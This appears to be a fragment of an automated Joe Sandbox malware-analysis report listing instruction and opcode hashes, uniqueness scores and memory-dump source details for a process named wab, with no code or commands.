                                                                                                                                                • Instruction ID: c59a560e0875e34eddc7238b356bca14a42e0d2f6379eea325777a24e0ec34d0
                                                                                                                                                • Opcode Fuzzy Hash: fabc9ae393473dab2d99963d71926c72f988121b711c3d64f0b7c32c5eef3d59
                                                                                                                                                • Instruction Fuzzy Hash: 2E11E6B7D00618ABDB01DFA4DC899DEB7ACEB49310F414836FA05CB140E634E2488799
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000005.00000002.1155967863.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$memset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1860491036-0
                                                                                                                                                • Opcode ID: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
                                                                                                                                                • Instruction ID: 34b624653e935ab7e36b2538589d62cee4ebe89d27a66743b3a416ac641d4af2
                                                                                                                                                • Opcode Fuzzy Hash: 140a0eb12754db57aa6ada1794f3b2876fa7f9e0ec6800b52e06a5fe23b56631
                                                                                                                                                • Instruction Fuzzy Hash: 8321B3B5A65300CEE7559F6A9845915FBE4FF90310B2AC8BF9218DB2B2D7B8C8408B15
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%